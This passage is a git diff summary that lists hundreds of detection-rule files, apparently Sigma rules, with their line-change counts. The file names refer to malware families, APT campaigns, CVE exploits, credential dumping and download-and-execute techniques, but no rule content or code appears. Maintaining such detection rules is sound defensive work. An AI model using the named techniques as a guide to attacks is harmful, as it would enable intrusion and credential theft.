...roc_creation_win_exploit_cve_2017_8759.yml | 3 +- .../proc_creation_win_malware_adwind.yml | 16 +- .../proc_creation_win_malware_fireball.yml | 2 +- ..._access_win_malware_verclsid_shellcode.yml | 8 +- .../proc_creation_win_malware_notpetya.yml | 10 +- ...n_win_malware_plugx_susp_exe_locations.yml | 12 +- .../proc_creation_win_malware_wannacry.yml | 64 +- ...oc_creation_win_apt_apt10_cloud_hopper.yml | 7 +- .../proc_creation_win_apt_ta17_293a_ps.yml | 5 +- ...on_win_apt_lazarus_binary_masquerading.yml | 3 +- .../pipe_created_apt_turla_named_pipes.yml | 18 +- .../proc_creation_win_malware_elise.yml | 6 +- ..._creation_win_apt_apt27_emissary_panda.yml | 5 +- .../TA/APT28/proc_creation_win_apt_sofacy.yml | 14 +- ...cozy_bear_phishing_campaign_indicators.yml | 7 +- ...apt_apt29_phishing_campaign_indicators.yml | 15 +- ...c_creation_win_apt_muddywater_activity.yml | 6 +- .../proc_creation_win_apt_oilrig_mar18.yml | 21 +- .../proc_creation_win_apt_slingshot.yml | 7 +- .../proc_creation_win_apt_tropictrooper.yml | 5 +- ...roc_creation_win_exploit_other_bearlpe.yml | 9 +- ...roc_creation_win_exploit_cve_2019_1378.yml | 3 +- ...roc_creation_win_exploit_cve_2019_1388.yml | 9 +- .../proc_creation_win_malware_babyshark.yml | 15 +- .../proc_creation_win_malware_dridex.yml | 17 +- .../proc_creation_win_malware_dtrack.yml | 6 +- .../proc_creation_win_malware_emotet.yml | 25 +- .../proc_creation_win_malware_formbook.yml | 40 +- ...tion_win_malware_lockergoga_ransomware.yml | 2 +- .../QBot/proc_creation_win_malware_qbot.yml | 7 +- .../Ryuk/proc_creation_win_malware_ryuk.yml | 19 +- ...creation_win_malware_snatch_ransomware.yml | 10 +- ...c_creation_win_apt_aptc12_bluemushroom.yml | 8 +- ...creation_win_apt_apt31_judgement_panda.yml | 9 +- ...c_creation_win_apt_bear_activity_gtr19.yml | 7 +- .../proc_creation_win_apt_empiremonkey.yml | 4 +- ...ation_win_apt_equationgroup_dll_u_load.yml | 11 +- .../proc_creation_win_apt_mustangpanda.yml | 20 +- .../proc_creation_win_apt_wocao.yml | 9 +- ...oc_creation_win_exploit_cve_2020_10189.yml | 3 +- ...roc_creation_win_exploit_cve_2020_1048.yml | 9 +- ...roc_creation_win_exploit_cve_2020_1350.yml | 3 +- ..._creation_win_malware_blue_mockingbird.yml | 8 +- ..._win_malware_emotet_rundll32_execution.yml | 14 +- ...creation_win_malware_ke3chang_tidepool.yml | 10 +- ...c_creation_win_malware_maze_ransomware.yml | 12 +- ...c_creation_win_malware_trickbot_wermgr.yml | 7 +- .../proc_creation_win_apt_evilnum_jul20.yml | 5 +- .../proc_creation_win_apt_gallium_iocs.yml | 83 +- .../proc_creation_win_apt_greenbug_may20.yml | 11 +- ...reation_win_apt_lazarus_group_activity.yml | 22 +- .../proc_creation_win_apt_unc2452_cmds.yml | 20 +- .../proc_creation_win_apt_unc2452_ps.yml | 8 +- ...ation_win_apt_unc2452_vbscript_pattern.yml | 4 +- .../proc_creation_win_apt_taidoor.yml | 9 +- ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 3 +- .../proc_creation_win_apt_winnti_pipemon.yml | 9 +- ...e_event_win_cve_2021_1675_printspooler.yml | 3 +- ...it_cve_2021_26084_atlassian_confluence.yml | 6 +- ..._win_exploit_cve_2021_26857_msexchange.yml | 4 +- ...le_event_win_cve_2021_26858_msexchange.yml | 8 +- ...ation_win_exploit_cve_2021_35211_servu.yml | 10 +- .../file_event_win_exploit_cve_2021_40444.yml | 3 +- ...oc_creation_win_exploit_cve_2021_40444.yml | 5 +- ..._2021_40444_office_directory_traversal.yml | 6 +- .../file_event_win_cve_2021_41379_msi_lpe.yml | 3 +- ...oc_creation_win_exploit_cve_2021_41379.yml | 21 +- ...t_win_cve_2021_44077_poc_default_files.yml | 4 +- ...n_win_exploit_other_razorinstaller_lpe.yml | 7 +- ...tion_win_exploit_other_systemnightmare.yml | 5 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 +- ...ation_win_malware_blackbyte_ransomware.yml | 7 +- .../Conti/proc_creation_win_malware_conti.yml | 2 +- .../proc_creation_win_malware_conti_7zip.yml | 2 +- ..._win_malware_conti_ransomware_commands.yml | 4 +- ...malware_conti_ransomware_database_dump.yml | 14 +- ...eation_win_malware_darkside_ransomware.yml | 2 +- ...ent_win_malware_devil_bait_script_drop.yml | 7 +- ...win_malware_devil_bait_output_redirect.yml | 12 +- .../image_load_malware_foggyweb_nobelium.yml | 3 +- ...win_malware_goofy_guineapig_broken_cmd.yml | 5 +- ...g_googleupdate_uncommon_child_instance.yml | 11 +- .../file_event_win_moriya_rootkit.yml | 8 +- ...le_event_win_malware_pingback_backdoor.yml | 11 +- .../image_load_malware_pingback_backdoor.yml | 11 +- ...creation_win_malware_pingback_backdoor.yml | 13 +- ...t_win_malware_small_sieve_evasion_typo.yml | 3 +- ...eation_win_malware_small_sieve_cli_arg.yml | 5 +- ...y_set_malware_small_sieve_evasion_typo.yml | 7 +- .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 25 +- .../proc_creation_win_apt_revil_kaseya.yml | 7 +- .../image_load_usp_svchost_clfsw32.yml | 3 +- .../proc_creation_win_apt_sourgrum.yml | 4 +- .../file_event_win_cve_2022_24527_lpe.yml | 5 +- ...2022_26809_rpcss_child_process_anomaly.yml | 4 +- ...eation_win_exploit_cve_2022_29072_7zip.yml | 20 +- ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 11 +- ...on_win_malware_hermetic_wiper_activity.yml | 17 +- ...raspberry_robin_single_dot_ending_file.yml | 8 +- ..._creation_win_apt_actinium_persistence.yml | 5 +- .../MERCURY/proc_creation_win_apt_mercury.yml | 4 +- ...023_22518_confluence_tomcat_child_proc.yml | 24 +- ...ve_2023_23397_outlook_reminder_trigger.yml | 5 +- ...ile_event_win_cve_2023_27363_foxit_rce.yml | 3 +- ...exploit_cve_2023_34362_moveit_transfer.yml | 4 + ...exploit_cve_2023_36874_report_creation.yml | 4 +- ...exploit_cve_2023_36874_wermgr_creation.yml | 7 +- ...win_exploit_cve_2023_36874_fake_wermgr.yml | 4 +- ..._office_windows_html_rce_file_patterns.yml | 3 +- ..._cve_2023_38331_winrar_susp_double_ext.yml | 7 +- ...ploit_cve_2023_38831_winrar_child_proc.yml | 30 +- ...t_cve_2023_40477_winrar_rev_file_abuse.yml | 6 +- ...loit_other_win_server_undocumented_rce.yml | 7 +- ...vent_win_malware_coldsteel_renamed_cmd.yml | 3 +- ...malware_coldsteel_service_dll_creation.yml | 3 +- ...ware_coldsteel_persistence_service_dll.yml | 7 +- ...in_malware_coldsteel_anonymous_process.yml | 3 +- ...creation_win_malware_coldsteel_cleanup.yml | 6 +- ..._malware_coldsteel_service_persistence.yml | 5 +- ...ry_set_malware_coldsteel_created_users.yml | 3 +- ...lware_darkgate_autoit3_binary_creation.yml | 15 +- ..._autoit3_from_susp_parent_and_location.yml | 15 +- ...win_malware_darkgate_net_user_creation.yml | 6 +- ..._creation_win_malware_griffon_patterns.yml | 5 +- ...ware_icedid_rundll32_dllregisterserver.yml | 10 +- ..._win_malware_pikabot_rundll32_activity.yml | 15 +- ...re_pikabot_combined_commands_execution.yml | 24 +- ...win_malware_pikabot_rundll32_discovery.yml | 17 +- ...win_malware_pikabot_rundll32_hollowing.yml | 11 +- ...n_malware_qakbot_regsvr32_calc_pattern.yml | 8 +- ..._win_malware_qakbot_rundll32_execution.yml | 9 +- ...on_win_malware_qakbot_rundll32_exports.yml | 14 +- ...are_qakbot_rundll32_fake_dll_execution.yml | 10 +- ...win_malware_qakbot_uninstaller_cleanup.yml | 17 +- ...alware_rhadamanthys_stealer_dll_launch.yml | 12 +- ..._malware_rorschach_ransomware_activity.yml | 2 +- ...event_win_malware_snake_installers_ioc.yml | 6 +- ...nt_win_malware_snake_werfault_creation.yml | 3 +- ...n_win_malware_snake_installer_cli_args.yml | 9 +- ...ation_win_malware_snake_installer_exec.yml | 9 +- ...on_win_malware_snake_service_execution.yml | 4 +- ...y_event_malware_snake_covert_store_key.yml | 3 +- ...gistry_set_malware_snake_encrypted_key.yml | 11 +- ...win_malware_socgholish_second_stage_c2.yml | 7 +- .../dns_query_win_malware_3cx_compromise.yml | 31 +- ...e_load_malware_3cx_compromise_susp_dll.yml | 65 +- ...ware_3cx_compromise_beaconing_activity.yml | 31 +- ...n_win_malware_3cx_compromise_execution.yml | 91 +- ...n_malware_3cx_compromise_susp_children.yml | 31 +- ...win_malware_3cx_compromise_susp_update.yml | 33 +- ...query_win_apt_diamond_steel_indicators.yml | 3 +- ...ation_win_apt_diamond_sleet_indicators.yml | 5 +- ...event_apt_diamond_sleet_scheduled_task.yml | 6 +- ...7_powershell_scripts_naming_convention.yml | 7 +- ...n_apt_fin7_powertrash_lateral_movement.yml | 7 +- ..._event_win_apt_lace_tempest_indicators.yml | 13 +- ...pt_lace_tempest_cobalt_strike_download.yml | 5 +- ..._win_apt_lace_tempest_loader_execution.yml | 3 +- ...ge_load_apt_lazarus_side_load_activity.yml | 3 +- ...storm_aspera_faspex_susp_child_process.yml | 109 +- ...storm_manage_engine_susp_child_process.yml | 112 +- ...ation_win_apt_mustang_panda_indicators.yml | 7 +- ...int_management_exploitation_indicators.yml | 4 +- ...t_print_management_exploitation_pc_app.yml | 3 +- ...ion_win_apt_peach_sandstorm_indicators.yml | 2 +- .../file_change_win_2022_timestomping.yml | 29 +- ...ge_win_unusual_modification_by_dns_exe.yml | 8 +- ...lete_win_cve_2021_1675_print_nightmare.yml | 3 +- .../file_delete_win_delete_backup_file.yml | 4 +- ...file_delete_win_delete_event_log_files.yml | 3 +- ...te_win_delete_exchange_powershell_logs.yml | 3 +- ...file_delete_win_delete_iis_access_logs.yml | 3 +- ..._win_delete_powershell_command_history.yml | 3 +- .../file_delete_win_delete_prefetch.yml | 5 +- ...file_delete_win_delete_teamviewer_logs.yml | 3 +- .../file_delete_win_delete_tomcat_logs.yml | 3 +- ...win_sysinternals_sdelete_file_deletion.yml | 3 +- ...delete_win_unusual_deletion_by_dns_exe.yml | 8 +- ...elete_win_zone_identifier_ads_uncommon.yml | 9 +- .../file_event_win_access_susp_teams.yml | 3 +- ...ile_event_win_access_susp_unattend_xml.yml | 10 +- ...n_adsi_cache_creation_by_uncommon_tool.yml | 34 +- .../file_event_win_advanced_ip_scanner.yml | 7 +- .../file_event_win_anydesk_artefact.yml | 16 +- ...vent_win_anydesk_writing_susp_binaries.yml | 13 +- .../file_event_win_aspnet_temp_files.yml | 21 +- .../file_event_win_bloodhound_collection.yml | 6 +- .../file_event_win_crackmapexec_patterns.yml | 8 +- ...t_win_create_evtx_non_common_locations.yml | 7 +- ...ile_event_win_create_non_existent_dlls.yml | 11 +- ...e_event_win_creation_new_shim_database.yml | 11 +- ...ile_event_win_creation_scr_binary_file.yml | 13 +- .../file_event_win_creation_system_file.yml | 8 +- ...ent_win_creation_unquoted_service_path.yml | 12 +- ...vent_win_cred_dump_tools_dropped_files.yml | 57 +- ...file_event_win_cscript_wscript_dropper.yml | 7 +- .../file_event_win_csexec_service.yml | 3 +- ...file_event_win_csharp_compile_artefact.yml | 11 +- ...ile_event_win_dcom_iertutil_dll_hijack.yml | 11 +- ...e_event_win_dll_sideloading_space_path.yml | 10 +- ...file_event_win_dump_file_susp_creation.yml | 12 +- ...ile_event_win_errorhandler_persistence.yml | 10 +- .../file_event_win_exchange_webshell_drop.yml | 13 +- ..._win_exchange_webshell_drop_suspicious.yml | 6 +- .../file_event_win_gotoopener_artefact.yml | 19 +- .../file_event_win_hktl_dumpert.yml | 7 +- ...nt_win_hktl_hivenightmare_file_exports.yml | 16 +- .../file_event_win_hktl_mimikatz_files.yml | 11 +- .../file_event/file_event_win_hktl_nppspy.yml | 3 +- ...le_event_win_hktl_powerup_dllhijacking.yml | 16 +- .../file_event_win_hktl_remote_cred_dump.yml | 4 +- ...tial_access_dll_search_order_hijacking.yml | 6 +- ...ile_event_win_iphlpapi_dll_sideloading.yml | 6 +- .../file_event_win_iso_file_mount.yml | 3 +- .../file_event_win_iso_file_recent.yml | 10 +- ...lbin_gather_network_info_script_output.yml | 11 +- ...vent_win_lsass_default_dump_file_names.yml | 18 +- .../file_event_win_lsass_shtinkering.yml | 7 +- .../file_event_win_lsass_werfault_dump.yml | 3 +- .../file_event/file_event_win_mal_adwind.yml | 16 +- .../file_event_win_msdt_susp_directories.yml | 3 +- .../file_event_win_net_cli_artefact.yml | 18 +- ...n_new_files_in_uncommon_appdata_folder.yml | 6 +- .../file_event_win_new_scr_file.yml | 6 +- ...vent_win_notepad_plus_plus_persistence.yml | 5 +- ...t_win_ntds_dit_uncommon_parent_process.yml | 13 +- ...le_event_win_ntds_dit_uncommon_process.yml | 8 +- .../file_event_win_ntds_exfil_tools.yml | 7 +- ...ile_event_win_office_addin_persistence.yml | 3 +- ...e_event_win_office_macro_files_created.yml | 4 +- ...vent_win_office_macro_files_downloaded.yml | 39 +- ...n_office_macro_files_from_susp_process.yml | 29 +- ...office_onenote_files_in_susp_locations.yml | 4 +- ..._win_office_onenote_susp_dropped_files.yml | 11 +- ...vent_win_office_outlook_macro_creation.yml | 4 +- .../file_event_win_office_outlook_newform.yml | 5 +- ...win_office_outlook_susp_macro_creation.yml | 4 +- ...fice_publisher_files_in_susp_locations.yml | 3 +- ...e_event_win_office_startup_persistence.yml | 26 +- ...e_event_win_office_susp_file_extension.yml | 12 +- ...event_win_office_uncommon_file_startup.yml | 45 +- .../file_event_win_perflogs_susp_files.yml | 3 +- ...t_win_powershell_drop_binary_or_script.yml | 4 +- ...e_event_win_powershell_drop_powershell.yml | 7 +- ...e_event_win_powershell_exploit_scripts.yml | 14 +- ...e_event_win_powershell_module_creation.yml | 3 +- ...nt_win_powershell_module_susp_creation.yml | 9 +- ...in_powershell_module_uncommon_creation.yml | 7 +- ...event_win_powershell_startup_shortcuts.yml | 21 +- ...licy_test_creation_by_uncommon_process.yml | 4 +- .../file_event_win_rdp_file_susp_creation.yml | 7 +- .../file_event_win_remcom_service.yml | 3 +- ...te_access_tools_screenconnect_artefact.yml | 18 +- ...access_tools_screenconnect_remote_file.yml | 17 +- .../file_event_win_ripzip_attack.yml | 17 +- .../file_event/file_event_win_sam_dump.yml | 45 +- ...e_event_win_shell_write_susp_directory.yml | 8 +- ..._win_shell_write_susp_files_extensions.yml | 4 +- ...le_event_win_startup_folder_file_write.yml | 15 +- ...e_event_win_susp_default_gpo_dir_write.yml | 3 +- .../file_event_win_susp_desktop_ini.yml | 4 +- ..._event_win_susp_desktopimgdownldr_file.yml | 6 +- .../file_event_win_susp_diagcab.yml | 3 +- .../file_event_win_susp_double_extension.yml | 18 +- ...ile_event_win_susp_exchange_aspx_write.yml | 4 +- ...ile_event_win_susp_executable_creation.yml | 4 +- .../file_event_win_susp_get_variable.yml | 11 +- ...t_win_susp_hidden_dir_index_allocation.yml | 12 +- ...file_event_win_susp_homoglyph_filename.yml | 114 +- ...n_susp_legitimate_app_dropping_archive.yml | 8 +- ...t_win_susp_legitimate_app_dropping_exe.yml | 8 +- ...in_susp_legitimate_app_dropping_script.yml | 8 +- ...le_event_win_susp_lnk_double_extension.yml | 15 +- .../file_event_win_susp_pfx_file_creation.yml | 3 +- ...file_event_win_susp_powershell_profile.yml | 3 +- ...cexplorer_driver_created_in_tmp_folder.yml | 15 +- ...e_event_win_susp_recycle_bin_fake_exec.yml | 21 +- ...vent_win_susp_spool_drivers_color_drop.yml | 3 +- ...nt_win_susp_startup_folder_persistence.yml | 8 +- ...win_susp_system_interactive_powershell.yml | 3 +- .../file_event_win_susp_task_write.yml | 3 +- ...ent_win_susp_vscode_powershell_profile.yml | 8 +- ...vent_win_susp_windows_terminal_profile.yml | 4 +- ..._event_win_susp_winsxs_binary_creation.yml | 4 +- ..._sysinternals_livekd_default_dump_name.yml | 7 +- ...e_event_win_sysinternals_livekd_driver.yml | 3 +- ...sinternals_livekd_driver_susp_creation.yml | 10 +- ...internals_procexp_driver_susp_creation.yml | 11 +- ...internals_procmon_driver_susp_creation.yml | 3 +- ..._event_win_sysinternals_psexec_service.yml | 7 +- ...nt_win_sysinternals_psexec_service_key.yml | 4 +- ...em32_local_folder_privilege_escalation.yml | 3 +- .../file_event_win_taskmgr_lsass_dump.yml | 7 +- ...e_event_win_tsclient_filewrite_startup.yml | 3 +- ..._event_win_uac_bypass_consent_comctl32.yml | 3 +- ...e_event_win_uac_bypass_dotnet_profiler.yml | 3 +- .../file_event_win_uac_bypass_eventvwr.yml | 1 + ...ent_win_uac_bypass_idiagnostic_profile.yml | 3 +- ...vent_win_uac_bypass_ntfs_reparse_point.yml | 3 +- .../file_event_win_uac_bypass_winsat.yml | 3 +- .../file_event_win_uac_bypass_wmp.yml | 3 +- ...le_event_win_vhd_download_via_browsers.yml | 10 +- ...scode_tunnel_remote_creation_artefacts.yml | 6 +- ...nt_win_vscode_tunnel_renamed_execution.yml | 8 +- ...ile_event_win_webshell_creation_detect.yml | 20 +- .../file_event_win_werfault_dll_hijacking.yml | 3 +- .../file_event_win_winrm_awl_bypass.yml | 7 +- ...ile_event_win_wmiexec_default_filename.yml | 9 +- ...event_win_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- .../file_event_win_wpbbin_persistence.yml | 6 +- ...le_event_win_writing_local_admin_share.yml | 7 +- ...load_cmstp_load_dll_from_susp_location.yml | 1 + ...image_load_dll_amsi_suspicious_process.yml | 4 +- ...rosoft_account_token_provider_dll_load.yml | 25 +- ...msvcs_load_renamed_version_by_rundll32.yml | 11 +- ..._load_dll_credui_uncommon_process_load.yml | 18 +- ...age_load_dll_dbghelp_dbgcore_susp_load.yml | 29 +- ...load_dll_dbghelp_dbgcore_unsigned_load.yml | 19 +- ...mage_load_dll_rstrtmgr_suspicious_load.yml | 40 +- .../image_load_dll_rstrtmgr_uncommon_load.yml | 21 +- .../image_load_dll_sdiageng_load_by_msdt.yml | 3 +- ...system_management_automation_susp_load.yml | 31 +- .../image_load_dll_tttracer_module_load.yml | 5 +- .../image_load_dll_vss_ps_susp_load.yml | 15 +- .../image_load_dll_vssapi_susp_load.yml | 31 +- .../image_load_dll_vsstrace_susp_load.yml | 25 +- .../image_load_hktl_sharpevtmute.yml | 11 +- .../image_load_hktl_silenttrinity_stager.yml | 4 +- ...load_iexplore_dcom_iertutil_dll_hijack.yml | 11 +- ...e_load_office_dotnet_assembly_dll_load.yml | 2 +- .../image_load_office_dotnet_clr_dll_load.yml | 2 +- .../image_load_office_dotnet_gac_dll_load.yml | 2 +- .../image_load_office_dsparse_dll_load.yml | 2 +- .../image_load_office_excel_xll_susp_load.yml | 11 +- .../image_load_office_kerberos_dll_load.yml | 2 +- ...image_load_office_outlook_outlvba_load.yml | 3 +- .../image_load_office_powershell_dll_load.yml | 2 +- .../image_load_office_vbadll_load.yml | 5 +- ...e_load_scrcons_wmi_scripteventconsumer.yml | 7 +- .../image_load/image_load_side_load_7za.yml | 4 +- ..._load_side_load_abused_dlls_susp_paths.yml | 28 +- .../image_load_side_load_antivirus.yml | 27 +- ...aruba_networks_virtual_intranet_access.yml | 3 +- .../image_load_side_load_ccleaner_du.yml | 3 +- ...ge_load_side_load_ccleaner_reactivator.yml | 3 +- ...image_load_side_load_classicexplorer32.yml | 3 +- .../image_load_side_load_comctl32.yml | 3 +- .../image_load_side_load_coregen.yml | 3 +- ...side_load_cpl_from_non_system_location.yml | 7 +- .../image_load_side_load_dbgcore_dll.yml | 5 +- .../image_load_side_load_dbghelp_dll.yml | 5 +- ...oad_side_load_from_non_system_location.yml | 18 +- .../image_load_side_load_goopdate.yml | 4 +- .../image_load_side_load_gup_libcurl.yml | 3 +- .../image_load_side_load_iviewers.yml | 3 +- .../image_load_side_load_libvlc.yml | 3 +- .../image_load_side_load_mfdetours.yml | 4 +- ...mage_load_side_load_mfdetours_unsigned.yml | 8 +- ...image_load_side_load_non_existent_dlls.yml | 17 +- .../image_load_side_load_office_dlls.yml | 5 +- ...side_load_rjvplatform_default_location.yml | 4 +- ..._load_rjvplatform_non_default_location.yml | 3 +- .../image_load_side_load_robform.yml | 6 +- .../image_load_side_load_shell_chrome_api.yml | 16 +- .../image_load_side_load_shelldispatch.yml | 8 +- .../image_load_side_load_smadhook.yml | 3 +- .../image_load_side_load_third_party.yml | 24 +- .../image_load_side_load_ualapi.yml | 3 +- .../image_load_side_load_vmguestlib.yml | 3 +- ...ge_load_side_load_vmmap_dbghelp_signed.yml | 7 +- ..._load_side_load_vmmap_dbghelp_unsigned.yml | 7 +- .../image_load_side_load_vmware_xfer.yml | 5 +- .../image_load_side_load_waveedit.yml | 3 +- .../image_load/image_load_side_load_wazuh.yml | 8 +- .../image_load_side_load_windows_defender.yml | 7 +- ..._susp_clickonce_unsigned_module_loaded.yml | 4 +- ...mage_load_susp_dll_load_system_process.yml | 5 +- .../image_load_susp_python_image_load.yml | 15 +- ...e_load_susp_script_dotnet_clr_dll_load.yml | 4 +- .../image_load_susp_uncommon_image_load.yml | 3 +- .../image_load_thor_unsigned_execution.yml | 3 +- .../image_load_uac_bypass_iscsicpl.yml | 4 +- ...ge_load_wmic_remote_xsl_scripting_dlls.yml | 9 +- ...mage_load_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- .../image_load_wsman_provider_image_load.yml | 30 +- .../net_connection_win_addinutil.yml | 3 +- .../net_connection_win_binary_susp_com.yml | 18 +- ...tion_win_certutil_initiated_connection.yml | 6 +- ...net_connection_win_crypto_mining_pools.yml | 34 +- ...net_connection_win_dead_drop_resolvers.yml | 26 +- ...et_connection_win_devtunnel_connection.yml | 19 +- ...et_connection_win_dfsvc_uncommon_ports.yml | 3 +- ...connection_win_dllhost_net_connections.yml | 19 +- ..._win_excel_outbound_network_connection.yml | 23 +- ...tion_win_google_api_non_browser_access.yml | 19 +- .../net_connection_win_hh.yml | 7 +- .../net_connection_win_imewdbld.yml | 8 +- .../net_connection_win_mega_nz.yml | 3 +- .../net_connection_win_msiexec.yml | 9 +- .../net_connection_win_ngrok_domains.yml | 3 +- .../net_connection_win_ngrok_tunnel.yml | 3 +- ...tion_win_notion_api_susp_communication.yml | 17 +- .../net_connection_win_office_susp_ports.yml | 3 +- ...tion_win_powershell_network_connection.yml | 20 +- .../net_connection_win_python.yml | 16 +- ...n_rdp_outbound_over_non_standard_tools.yml | 9 +- .../net_connection_win_rdp_reverse_tunnel.yml | 7 +- .../net_connection_win_rdp_to_http.yml | 3 +- ...tion_win_reddit_api_non_browser_access.yml | 20 +- ..._win_remote_powershell_session_network.yml | 29 +- ...onnection_win_rundll32_net_connections.yml | 55 +- .../net_connection_win_script.yml | 3 +- .../net_connection_win_script_wan.yml | 23 +- ..._connection_win_susp_binary_no_cmdline.yml | 11 +- .../net_connection_win_susp_dropbox_api.yml | 3 +- .../net_connection_win_susp_epmap.yml | 6 +- ...connection_win_susp_external_ip_lookup.yml | 18 +- ...nection_win_susp_malware_callback_port.yml | 13 +- ...n_susp_malware_callback_ports_uncommon.yml | 7 +- ..._win_susp_outbound_kerberos_connection.yml | 11 +- ...n_win_susp_outbound_mobsync_connection.yml | 3 +- ...ion_win_susp_outbound_smtp_connections.yml | 10 +- ..._susp_prog_location_network_connection.yml | 8 +- ...on_win_telegram_api_non_browser_access.yml | 18 +- ...onnection_win_vscode_tunnel_connection.yml | 19 +- ...onnection_win_winlogon_net_connections.yml | 6 +- ...nection_win_wuauclt_network_connection.yml | 39 +- ...dfs_namedpipe_connection_uncommon_tool.yml | 17 +- .../pipe_created_hktl_cobaltstrike.yml | 18 +- .../pipe_created_hktl_cobaltstrike_re.yml | 58 +- ...d_hktl_cobaltstrike_susp_pipe_patterns.yml | 68 +- .../pipe_created_hktl_coercedpotato.yml | 7 +- .../pipe_created_hktl_diagtrack_eop.yml | 12 +- .../pipe_created_hktl_efspotato.yml | 13 +- ...ted_hktl_generic_cred_dump_tools_pipes.yml | 10 +- .../pipe_created_hktl_koh_default_pipe.yml | 7 +- ...created_powershell_alternate_host_pipe.yml | 27 +- ...pipe_created_powershell_execution_pipe.yml | 14 +- .../pipe_created_pua_csexec_default_pipe.yml | 11 +- .../pipe_created_pua_paexec_default_pipe.yml | 7 +- .../pipe_created_pua_remcom_default_pipe.yml | 11 +- ...created_scrcons_wmi_consumer_namedpipe.yml | 7 +- ...pipe_created_susp_malicious_namedpipes.yml | 62 +- ...nals_psexec_default_pipe_susp_location.yml | 20 +- ...on_win_userdomain_variable_enumeration.yml | 2 +- ...c_access_win_cmstp_execution_by_access.yml | 4 +- ...ktl_cobaltstrike_bof_injection_pattern.yml | 3 +- .../proc_access_win_hktl_generic_access.yml | 179 +- ...ccess_win_hktl_handlekatz_lsass_access.yml | 8 +- .../proc_access_win_hktl_sysmonente.yml | 3 +- ...proc_access_win_lsass_dump_comsvcs_dll.yml | 3 +- ...oc_access_win_lsass_dump_keyword_image.yml | 5 +- .../proc_access_win_lsass_memdump.yml | 22 +- ...roc_access_win_lsass_python_based_tool.yml | 11 +- ...s_win_lsass_remote_access_trough_winrm.yml | 3 +- .../proc_access_win_lsass_seclogon_access.yml | 6 +- ...proc_access_win_lsass_susp_access_flag.yml | 90 +- .../proc_access_win_lsass_werfault.yml | 4 +- ...ss_win_lsass_whitelisted_process_names.yml | 15 +- ...ess_win_susp_direct_ntopenprocess_call.yml | 13 +- ...roc_access_win_susp_invoke_patchingapi.yml | 24 +- ...oc_access_win_susp_shellcode_injection.yml | 16 +- ..._access_win_svchost_credential_dumping.yml | 3 +- ...access_win_svchost_susp_access_request.yml | 4 +- ...in_uac_bypass_editionupgrademanagerobj.yml | 3 +- ...roc_access_win_uac_bypass_wow64_logger.yml | 3 +- ...proc_creation_win_7zip_exfil_dmp_files.yml | 28 +- ...creation_win_7zip_password_compression.yml | 23 +- ..._creation_win_7zip_password_extraction.yml | 24 +- ...ation_win_addinutil_suspicious_cmdline.yml | 24 +- ...n_win_addinutil_uncommon_child_process.yml | 7 +- ...reation_win_addinutil_uncommon_cmdline.yml | 16 +- ...eation_win_addinutil_uncommon_dir_exec.yml | 7 +- .../proc_creation_win_adplus_memory_dump.yml | 13 +- ...tion_win_agentexecutor_potential_abuse.yml | 28 +- ..._creation_win_agentexecutor_susp_usage.yml | 27 +- ...tion_win_appvlp_uncommon_child_process.yml | 18 +- ...creation_win_aspnet_compiler_exectuion.yml | 17 +- ...win_aspnet_compiler_susp_child_process.yml | 37 +- ...reation_win_aspnet_compiler_susp_paths.yml | 20 +- ..._creation_win_at_interactive_execution.yml | 5 +- .../proc_creation_win_attrib_hiding_files.yml | 13 +- .../proc_creation_win_attrib_system.yml | 13 +- ..._creation_win_attrib_system_susp_paths.yml | 26 +- ...ion_win_auditpol_nt_resource_kit_usage.yml | 21 +- ...c_creation_win_auditpol_susp_execution.yml | 31 +- ...oc_creation_win_bash_command_execution.yml | 14 +- .../proc_creation_win_bash_file_execution.yml | 25 +- ..._creation_win_bcdedit_boot_conf_tamper.yml | 22 +- ...oc_creation_win_bcdedit_susp_execution.yml | 6 +- ...on_win_bginfo_suspicious_child_process.yml | 39 +- ...tion_win_bginfo_uncommon_child_process.yml | 7 +- .../proc_creation_win_bitsadmin_download.yml | 10 +- ...ation_win_bitsadmin_download_direct_ip.yml | 17 +- ...itsadmin_download_file_sharing_domains.yml | 10 +- ...win_bitsadmin_download_susp_extensions.yml | 8 +- ...n_bitsadmin_download_susp_targetfolder.yml | 11 +- ...tsadmin_download_uncommon_targetfolder.yml | 8 +- ...on_win_bitsadmin_potential_persistence.yml | 15 +- ...n_browsers_chromium_headless_debugging.yml | 12 +- ...on_win_browsers_chromium_headless_exec.yml | 6 +- ...owsers_chromium_headless_file_download.yml | 9 +- ...n_win_browsers_chromium_load_extension.yml | 12 +- ...on_win_browsers_chromium_mockbin_abuse.yml | 8 +- ..._browsers_chromium_susp_load_extension.yml | 9 +- ...tion_win_browsers_inline_file_download.yml | 9 +- ...creation_win_browsers_remote_debugging.yml | 12 +- .../proc_creation_win_calc_uncommon_exec.yml | 12 +- ...n_win_certmgr_certificate_installation.yml | 28 +- .../proc_creation_win_certoc_download.yml | 10 +- ...creation_win_certoc_download_direct_ip.yml | 12 +- .../proc_creation_win_certoc_load_dll.yml | 13 +- ...ion_win_certoc_load_dll_susp_locations.yml | 15 +- ..._win_certutil_certificate_installation.yml | 30 +- .../proc_creation_win_certutil_decode.yml | 12 +- .../proc_creation_win_certutil_download.yml | 18 +- ...eation_win_certutil_download_direct_ip.yml | 44 +- ...certutil_download_file_sharing_domains.yml | 21 +- .../proc_creation_win_certutil_encode.yml | 15 +- ...on_win_certutil_encode_susp_extensions.yml | 15 +- ...tion_win_certutil_encode_susp_location.yml | 16 +- .../proc_creation_win_certutil_export_pfx.yml | 15 +- ...oc_creation_win_certutil_ntlm_coercion.yml | 6 +- ...proc_creation_win_chcp_codepage_lookup.yml | 8 +- ...proc_creation_win_chcp_codepage_switch.yml | 16 +- ...tion_win_cipher_overwrite_deleted_data.yml | 20 +- ...ion_win_citrix_trolleyexpress_procdump.yml | 9 +- .../proc_creation_win_clip_execution.yml | 8 +- ...ion_win_cloudflared_portable_execution.yml | 6 +- ..._win_cloudflared_quicktunnel_execution.yml | 122 +- ...reation_win_cloudflared_tunnel_cleanup.yml | 7 +- ...oc_creation_win_cloudflared_tunnel_run.yml | 8 +- .../proc_creation_win_cmd_assoc_execution.yml | 23 +- ..._cmd_assoc_tamper_exe_file_association.yml | 26 +- ...c_creation_win_cmd_copy_dmp_from_share.yml | 12 +- ...ation_win_cmd_curl_download_exec_combo.yml | 7 +- 